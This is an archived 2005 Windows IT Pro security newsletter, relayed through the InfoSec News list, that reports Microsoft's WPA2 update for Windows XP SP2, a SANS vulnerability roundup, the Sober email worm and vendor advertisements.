[ISN] Security UPDATE -- WPA2 and WSP IE for Windows XP SP2 -- May 11, 2005

InfoSec News isn at c4i.org
Fri May 13 07:08:05 EDT 2005


This email newsletter comes to you free and is supported by the 
following advertisers, which offer products and services in which 
you might be interested. Please take a moment to visit these 
advertisers' Web sites and show your support for Security UPDATE. 

Managing and Securing IM in the Enterprise: Why It Should Be a Top Priority

Integrated Help Desk Services Lead to Greater IT Productivity


1. In Focus: WPA2 and WSP IE for Windows XP SP2

2. Security News and Features
   - Recent Security Vulnerabilities
   - SANS Reports Most Dangerous Vulnerabilities for Q1 2005
   - Sobering Worm Inundates Inboxes

3. Security Toolkit
   - Security Matters Blog
   - FAQ
   - Security Forum Featured Thread

4. New and Improved
   - Server Monitoring Service


==== Sponsor: Akonix Systems ====

Managing and Securing IM in the Enterprise: Why It Should Be a Top 
   With instant messaging virtually in all corporate environments, and 
expected to be as prevalent as email in the near future, it has rapidly 
become an indispensable business communication tool. Yet, IM growth 
within the enterprise brings an associated increase in security risks 
to both public and enterprise IM networks. In this free white paper, 
learn how you can take control of IM use on your network to ensure 
security and compliance. You'll learn how to protect yourself from 
Virus & worms attacks, Identity theft, Leakage of confidential 
information and more. Download now!


==== 1. In Focus: WPA2 and WSP IE for Windows XP SP2 ====
   by Mark Joseph Edwards, News Editor, mark at ntsecurity / net

If you use wireless networking in your environment, you'll be 
interested to learn that Microsoft has released an update to improve 
wireless network security for users of Windows XP with Service Pack 2 
(SP2). The update enhances the XP wireless client software with support 
for Wi-Fi Protected Access 2 (WPA2), which according to the Wi-Fi 
Alliance "is based on the final IEEE 802.11i amendment to the 802.11 
standard and is eligible for FIPS 140-2 compliance." 

WPA2 offers much stronger security than Wireless Equivalent Privacy 
(WEP) or Wi-Fi Protected Access (WPA). WEP has long been known to be 
vulnerable. I've read at least one account in which a WEP connection 
was cracked in only a few minutes. The successor to WEP, WPA, isn't as 
easy to crack as WPA, and the new WPA2 standard offers even better 
security. The Wi-Fi Alliance said the primary difference between WPA 
and WPA2 is that WPA2 uses the Advanced Encryption Standard (AES) to 
encrypt network traffic and WPA uses the Rivest Cipher 4 (RC-4) 

WPA2 Personal supports preshared keys, and WPA2 Enterprise uses 802.1x 
authentication with the Extensible Authentication Protocol (EAP). Like 
WPA, WPA2 facilitates roaming access between wireless Access Points 
(APs). Several manufacturers already make WPA2-certified APs and 
wireless NICs, and many provide WPA2 hardware and drivers that work 
with several versions of Windows. For example, Broadcom, Cisco Systems, 
Devicescape Software (formerly Instant802 Networks), Intel, and Realtek 
Semiconductor all make WPA2-enabled products that can be used on almost 
any Windows platform. Other vendors make products based on Atheros 
Communications chipsets, which are also WPA2-certified. 

Wireless Provisioning Services Information Element (WPS IE) is also 
included in the update. Some wireless ISPs are moving from unsecured to 
secured networks by implementing 802.1x. As the transitions take place, 
ISPs can configure their APs to broadcast one Service Set Identifier 
(SSID) for the unsecured network and another SSID for the secure 
network. The SSIDs for the secured networks aren't visible on systems 
that don't support WPS IE because of the way some APs broadcast Beacon 
and Probe Request frames. WPS IE helps computers recognize both types 
of wireless AP SSIDs.

You can learn more about the new update at the link above. You can also 
learn more about creating secure wireless hotspots in the MSDN Library 
article "Securing Public Wi-Fi Hotspots" at

Microsoft TechNet also has a new Cable Guy column, "Wi-Fi Protected 
Access 2 (WPA2) Overview." The column explains WPA2 in a fair amount of 
detail, including key caching, fast roaming, pre-authentication, and 

In addition, Microsoft maintains links to numerous other wireless-
related articles on its Windows Server 2003 Wi-Fi Web site. 

A new white paper, "Deploying Wi-Fi Protected Access (WPA) and WPA2 in 
the Enterprise," is available in PDF format at The Wi-Fi Alliance's Web 
site (first URL below). A 60-minute presentation, "Wi-Fi Protected 
Access: Locking Down the Link," by Michael Disabato of the Burton 
Group, reviews WEP, WPA, WPA2, implementation, and more and is also 
available at the Wi-Fi Alliance Web site (second URL below). 


In the Web chat "Reality Check: What to Expect with Windows Server 2003 
Service Pack 1," Michael Otey will answer your questions about Windows 
Firewall, Data Execution Prevention (DEP), boot-time protection, the 
Security Configuration Wizard (SCW), and much more. Thursday, May 12, 
12:00 noon Eastern (9:00 A.M. Pacific).


==== Sponsor: HP ====

Integrated Help Desk Services Lead to Greater IT Productivity
   As organizations focus on aligning IT infrastructures to support 
business needs, IT managers must have the processes and tools to ensure 
that the infrastructure keeps pace with business needs and provides 
guaranteed levels of service at predetermined costs. This free white 
paper explores how to meet IT infrastructure's needs and manage crucial 
support and service processes by implementing Help Desk, problem, 
change, configuration, and service-level agreement (SLA) management 
into a single workflow. Improve productivity and service delivery 
quality while reducing costs, resources, and downtime in your 
organization. Download now!


==== 2. Security News and Features ====

Recent Security Vulnerabilities
   If you subscribe to this newsletter, you also receive Security 
Alerts, which inform you about recently discovered security 
vulnerabilities. You can also find information about these 
discoveries at

SANS Reports Most Dangerous Vulnerabilities for Q1 2005
   SANS released a list of what it considers the most dangerous 
vulnerabilities discovered in first quarter 2005. Affected products 
include multiple Microsoft products; Computer Associates' License 
software; multiple Oracle servers; media players Nullsoft Winamp, Apple 
Computer's iTunes Music Store, and RealNetworks' RealPlayer (and 
Microsoft Windows Media Player); antivirus products from Symantec, 
Trend Micro, and McAfee; and DNS services in Symantec security products 
(and Windows OSs).

Sobering Worm Inundates Inboxes
   The latest incarnation of the Sober worm is inundating inboxes in 
some countries with an enticement to win tickets to the World Cup 
soccer tournament in Germany. The email message that carries the worm 
(known as Sober.N, Sober.O, Sober.P, Sober.S, or Sober.V, depending on 
which antivirus vendor database you check) could also have a different 
message subject and content. 


==== Resources and Events ====

Improve the Availability of Your Exchange Servers
   Managing storage growth, providing application resiliency, and 
handling small errors and problems before they grow are all important 
aspects of boosting your Exchange uptime. In this free Web seminar, 
discover how storage and application management techniques for Exchange 
can be used to improve the resiliency and performance of your Exchange 
infrastructure. Register now!

Updating Software on Windows Desktops and Servers: WSUS and Beyond
   In this free Web seminar, join industry expert Dan Holme as he 
explores options for implementing and managing WSUS and other automated 
solutions in your organization. You'll learn how WSUS makes it easy to 
keep Windows systems and Microsoft applications up-to-date with 
patches, security rollups, drivers, and updates. Plus, you'll discover 
alternatives to manage the deployment and patching of non-Microsoft 

Establish a Manageable Desktop Software Configuration and Control IT 
   Managing desktop software configurations is a manual process, 
resulting in unplanned costs, deployment delays, and client confusion. 
In this free Web seminar, find out how you can meet software-package-
preparation requirements and increase your desktop reliability, user 
satisfaction, and IT cost effectiveness. You'll learn about the new 
application process, issue management during package preparation, 
historical recording and reporting, and more.

Take the Hack IIS 6.0 challenge now!
   Follow along as industry guru Roger Grimes puts IIS 6.0 to the test. 
The first hacker to succeed will win an Xbox.

Get Ready for SQL Server 2005 Roadshow in a U.S. City Near You--and in 
   Get the facts about migrating to SQL Server 2005. SQL Server experts 
will present real-world information about administration, development, 
and business intelligence to help you implement a best-practices 
migration to SQL Server 2005 and improve your database computing 
environment. Attend and receive a 1-year membership to PASS and 1-year 
subscription to SQL Server Magazine. Register now!
   For a U.S. city

   For Europe


==== Featured White Paper ====

Phishing, Viruses, Bot-Nets and More: How to Prevent the "Perfect 
Storm" from Devastating Your Email System
   Unfortunately, fragmented appliance-based and software-based 
antispam solutions operating inside the email gateway can't prevent a 
potentially devastating impact on your email system and users. In this 
free white paper, learn how you can protect your email boundary and 
stop attacks with a multilayered approach that effectively prevents the 
perfect storm from ever reaching your email gateway. Download your copy 


==== Hot Release ====

Best Practices for Establishing and Enforcing a Security Policy in Your 
   With all the viruses, Trojans, spyware, malware, and malicious 
attacks out there, is your company as prepared as it can be to fend off 
these threats? This white paper will provide you with detailed 
information for establishing and enforcing a security policy so that 
you have a safety net to fall back on and can ensure that you're making 
the right decisions at a demanding time. Specifically, you'll go 
through the process of creating a security policy and creating an 
incident response plan to prepare your organization for the worst-case 
scenario. Download this free white paper now!


==== 3. Security Toolkit ==== 

Security Matters Blog: 20 Security Fixes for Mac OS X
   by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=990C:4FB69

   Got Mac? If you do, check Apple Computing's download site to see if 
you need to install the latest security update. The company released 
Security Update 2005-005 for Mac OS X 10.3.9 (client and server 
editions), which contains 20 security fixes.

   by John Savill, http://list.windowsitpro.com/t?ctl=9909:4FB69 

Q: How can I create a Microsoft Office 2003 installation source that 
has an integrated service pack and hotfixes?

Find the answer at

Security Forum Featured Thread: Guest User Password Required
   A forum participant writes that he has a Windows 2000-based mixed-
mode domain. He wants to know if there's a way to use Group Policy to 
force a password to be required for the Guest user account at the 
domain level. If not, how can he set the local policies on each system 
without having to physically visit each computer? Join the discussion 


==== Announcements ====
   (from Windows IT Pro and its partners)

SQL Server Magazine Gives DBAs and Developers What They Need
   With SQL Server 2005 right around the corner, it's important to note 
that SQL Server Magazine is on target to deliver comprehensive coverage 
of all betas of the new product and the final release. If you aren't 
already a subscriber, now is the time to subscribe. Act now and save 
47% off the cover price, plus get the new Reporting Services poster.

Nominate Yourself or a Friend for the MCP Hall of Fame
   Are you a top-notch MCP who deserves to be a part of the first-ever 
MCP Hall of Fame? Get the fame you deserve by nominating yourself or a 
peer to become a part of this influential community of certified 
professionals. You could win a VIP trip to Microsoft and other valuable 
prizes. Enter now--it's easy:


==== 4. New and Improved ====
   by Renee Munshi, products at windowsitpro.com

Server Monitoring Service
   TAB Computer Systems today announced the availability of PatrolDog 
2.0, a monitoring and support service for small businesses' file 
servers. PatrolDog monitors (over the Internet) critical server items 
such as Windows event logs, daily backups, disk space usage, power 
issues, hardware failures, and virus and security issues. TAB is 
currently offering a trial of PatrolDog, in which it will gather and 
analyze your server information and then email you a server status 
report. Pricing is per month: $60 for the first server, $40 for the 
second server, and $20 for each additional server. For more 
information, go to

Tell Us About a Hot Product and Get a T-Shirt!
   Have you used a product that changed your IT experience by saving 
you time or easing your daily burden? Tell us about the product, and 
we'll send you a T-shirt if we write about the product in a future 
Windows IT Pro What's Hot column. Send your product suggestions with 
information about how the product has helped you to 
   whatshot at windowsitpro.com.

Editor's note: Share Your Security Discoveries and Get $100
   Share your security-related discoveries, comments, or problems and 
solutions in the Windows IT Security print newsletter's Reader to 
Reader column. Email your contributions (500 words or less) to 
r2rwinitsec at windowsitpro.com. If we print your submission, you'll 
get $100. We edit submissions for style, grammar, and length.


==== Sponsored Links ====

Converting a Microsoft Access Application to Oracle HTML DB
   Convert MS Access into a Web application for multiple users. 
Download now!


==== Contact Us ==== 

About the newsletter -- letters at windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=990E:4FB69
About product news -- products at windowsitpro.com
About your subscription -- windowsitproupdate at windowsitpro.com
About sponsoring Security UPDATE -- emedia_opps at windowsitpro.com


This email newsletter is brought to you by Windows IT Security, 
the leading publication for IT professionals securing the Windows 
enterprise from external intruders and controlling access for 
internal users. Subscribe today.

View the Windows IT Pro privacy policy at

Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department

Copyright 2005, Penton Media, Inc. All rights reserved.

More information about the ISN mailing list